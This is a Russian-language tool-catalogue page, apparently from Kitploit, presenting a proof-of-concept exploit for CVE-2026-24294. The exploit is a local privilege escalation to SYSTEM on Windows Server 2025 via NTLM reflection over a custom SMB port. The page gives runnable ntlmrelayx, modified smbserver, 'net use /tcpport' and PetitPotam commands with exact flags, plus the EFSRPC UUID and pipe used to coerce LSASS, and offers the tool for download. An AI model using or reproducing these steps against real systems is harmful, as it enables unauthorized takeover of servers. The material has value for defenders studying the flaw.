Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24294 — Локальный PoC повышения привилегий для CVE-2026-24294, использующий произвольный порт SMB и отражение NTLM для получения SYSTEM на Windows Server 2025. | Kitploit
Инструменты/GitHubGitHub/0xndi/cve-2026-24294
Повышение привилегийАнализ уязвимостейЭксплуатацияЛатеральное перемещениеТестирование на ПроникновениеRed Teaming
GitHub0xndi/cve-2026-24294

CVE-2026-24294

Локальный PoC повышения привилегий для CVE-2026-24294, использующий произвольный порт SMB и отражение NTLM для получения SYSTEM на Windows Server 2025.

Репозиторий
5363 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24294 — Локальное повышение привилегий через NTLM-рефлексию с использованием произвольного порта SMB

Локальное повышение привилегий на Windows Server 2025 через NTLM-рефлексию, использующее функцию произвольного порта SMB, появившуюся в Windows 11 24H2 / Server 2025.

Уязвимость

В Windows 11 24H2 / Server 2025 появилась функция SMB-клиента, позволяющая устанавливать соединения на произвольных TCP-портах (net use \\host\share /tcpport:PORT). В сочетании с мультиплексированием SMB-сессий (MS-SMB2, раздел 3.2.4.2) это открывает возможность локальной NTLM-рефлексии — пользователь с низкими привилегиями может принудить привилегированную службу (LSASS) пройти аутентификацию на управляемом злоумышленником SMB-сервере на нестандартном порту, а затем переслать перехваченную NTLM-аутентификацию обратно на реальную SMB-службу на порту 445.

Воздействие: NT AUTHORITY\SYSTEM из-под любого локального пользователя.

Затронутые системы: Windows Server 2025 (конфигурация по умолчанию). В Windows 11 24H2 включена подпись SMB, что блокирует ретрансляцию.

Схема атаки

root@kitploit:~
 LSASS (SYSTEM) ──NTLM──► SMB Client ──TCP:12345──► smbserver.py (наш)
                                                   │
                                                   ▼ ретрансляция NTLM-блобов
 SMB Service (:445) ◄────────────────── ntlmrelayx.py
 ← сессия SYSTEM
  1. net use открывает TCP-соединение с нашим SMB-сервером на пользовательском порту
  2. PetitPotam принуждает LSASS пройти аутентификацию на \\127.0.0.1\share
  3. SMB-клиент повторно использует существующее TCP-соединение (мультиплексирование сессий)
  4. Наш smbserver перехватывает привилегированный NTLM-блоб и ретранслирует его через ntlmrelayx
  5. ntlmrelayx проходит аутентификацию на реальной SMB-службе на порту 445 как SYSTEM

Требования

  • Целевая система Windows Server 2025
  • Python 3 с Impacket
  • PetitPotam.exe (сборка из исходников с помощью Visual Studio, см. PetitPotam/)

Использование

Откройте 3 терминала.

Терминал 1 — Запустите ntlmrelayx (слушает на RAW-порту 6666, ретранслирует на локальный SMB):

root@kitploit:~
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server --no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server -t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666

Терминал 2 — Запустите модифицированный smbserver (слушает на порту 12345, ретранслирует NTLM на порт 6666):

root@kitploit:~
python smbserver.py test . -port 12345 -smb2support -username user -password user -relay-port 6666

Терминал 3 — Запустите эксплойт:

root@kitploit:~
:: Подключение общего ресурса на пользовательском порту (открывает постоянное TCP-соединение)
net use \\127.0.0.1\test /tcpport:12345 /user:user user

:: Принуждение LSASS пройти аутентификацию на нашем SMB-сервере
PetitPotam.exe 127.0.0.1 localhost 2

Вывод whoami из ntlmrelayx покажет NT AUTHORITY\SYSTEM.

Компоненты

  • PetitPotam/ — Модифицированный исходный код PetitPotam. Два изменения относительно оригинальной версии:
    • UUID: df1941c5-fe89-4e79-bf10-463657acf44d (интерфейс EFSRPC для WS2025)
    • Именованный канал: \pipe\efsrpc
    • Используется API #2 (EfsRpcEncryptFileSrv), имя общего ресурса жестко задано как test
  • smbserver.py — Модифицированный smbserver из Impacket с флагом -relay-port. Перехватывает SMB2 SESSION_SETUP для захвата второй NTLM-аутентификации на мультиплексированном соединении и ретранслирует её на RAW-ретранслятор (ntlmrelayx --raw-port).

Авторы

Этот PoC в основном написан ИИ (GLM 5.1) на основе исследований и техник, описанных в:

  • Bypassing Windows Authentication Reflection Mitigations for System Shells — Гийом Андре, Synacktiv

Ссылки

  • CVE-2026-24294 — Центр реагирования на угрозы безопасности Microsoft
  • PetitPotam — Жиль Лионель
  • Impacket — Fortra
Скачать инструмент